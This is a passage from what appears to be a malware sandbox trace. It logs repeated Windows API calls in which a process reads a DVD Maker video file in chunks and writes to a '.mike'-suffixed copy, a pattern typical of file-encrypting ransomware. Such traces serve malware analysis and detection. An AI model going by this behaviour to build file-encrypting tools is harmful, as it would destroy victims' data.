Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.768] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.768] GetFileType (hFile=0x288) returned 0x1 [0064.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.768] GetFileType (hFile=0x288) returned 0x1 [0064.768] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x322a20 [0064.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.769] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.769] GetFileType (hFile=0x288) returned 0x1 [0064.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.769] GetFileType (hFile=0x288) returned 0x1 [0064.769] ReadFile (in: hFile=0x288, lpBuffer=0x2132894, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2132894*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.770] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.770] GetFileType (hFile=0x288) returned 0x1 [0064.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.770] GetFileType (hFile=0x288) returned 0x1 [0064.770] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x325220 [0064.771] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.771] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.771] GetFileType (hFile=0x288) returned 0x1 [0064.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.771] GetFileType (hFile=0x288) returned 0x1 [0064.771] ReadFile (in: hFile=0x288, lpBuffer=0x213f8c4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x213f8c4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.772] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.772] GetFileType (hFile=0x288) returned 0x1 [0064.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.772] GetFileType (hFile=0x288) returned 0x1 [0064.772] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x327a20 [0064.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.773] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.773] GetFileType (hFile=0x288) returned 0x1 [0064.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.773] GetFileType (hFile=0x288) returned 0x1 [0064.773] ReadFile (in: hFile=0x288, lpBuffer=0x214c8f4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x214c8f4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.774] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.774] GetFileType (hFile=0x288) returned 0x1 [0064.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.774] GetFileType (hFile=0x288) returned 0x1 [0064.774] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x32a220 [0064.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.775] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.775] GetFileType (hFile=0x288) returned 0x1 [0064.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.775] GetFileType (hFile=0x288) returned 0x1 [0064.775] ReadFile (in: hFile=0x288, lpBuffer=0x2159924, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2159924*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.776] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.776] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.776] GetFileType (hFile=0x288) returned 0x1 [0064.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.776] GetFileType (hFile=0x288) returned 0x1 [0064.776] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x32ca20 [0064.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.777] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.777] GetFileType (hFile=0x288) returned 0x1 [0064.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.777] GetFileType (hFile=0x288) returned 0x1 [0064.777] ReadFile (in: hFile=0x288, lpBuffer=0x2166954, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2166954*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.778] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.778] GetFileType (hFile=0x288) returned 0x1 [0064.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.778] GetFileType (hFile=0x288) returned 0x1 [0064.778] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x32f220 [0064.779] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.779] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.779] GetFileType (hFile=0x288) returned 0x1 [0064.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.779] GetFileType (hFile=0x288) returned 0x1 [0064.779] ReadFile (in: hFile=0x288, lpBuffer=0x2173984, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2173984*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.780] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.780] GetFileType (hFile=0x288) returned 0x1 [0064.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.780] GetFileType (hFile=0x288) returned 0x1 [0064.780] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x331a20 [0064.781] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.781] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.781] GetFileType (hFile=0x288) returned 0x1 [0064.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.781] GetFileType (hFile=0x288) returned 0x1 [0064.781] ReadFile (in: hFile=0x288, lpBuffer=0x21809b4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21809b4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.782] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.782] GetFileType (hFile=0x288) returned 0x1 [0064.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.783] GetFileType (hFile=0x288) returned 0x1 [0064.783] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x334220 [0064.783] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.783] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.783] GetFileType (hFile=0x288) returned 0x1 [0064.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.783] GetFileType (hFile=0x288) returned 0x1 [0064.783] ReadFile (in: hFile=0x288, lpBuffer=0x218d9e4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x218d9e4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.784] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.784] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.784] GetFileType (hFile=0x288) returned 0x1 [0064.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.785] GetFileType (hFile=0x288) returned 0x1 [0064.785] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x336a20 [0064.785] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.785] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.785] GetFileType (hFile=0x288) returned 0x1 [0064.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.785] GetFileType (hFile=0x288) returned 0x1 [0064.785] ReadFile (in: hFile=0x288, lpBuffer=0x219aa14, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x219aa14*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.786] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.787] GetFileType (hFile=0x288) returned 0x1 [0064.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.787] GetFileType (hFile=0x288) returned 0x1 [0064.787] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x339220 [0064.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.787] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.787] GetFileType (hFile=0x288) returned 0x1 [0064.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.787] GetFileType (hFile=0x288) returned 0x1 [0064.787] ReadFile (in: hFile=0x288, lpBuffer=0x21a7a44, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21a7a44*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.788] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.788] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.789] GetFileType (hFile=0x288) returned 0x1 [0064.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.789] GetFileType (hFile=0x288) returned 0x1 [0064.789] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x33ba20 [0064.789] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.790] CreateFileW (lpFileName="C:\\Program Files\\DVD 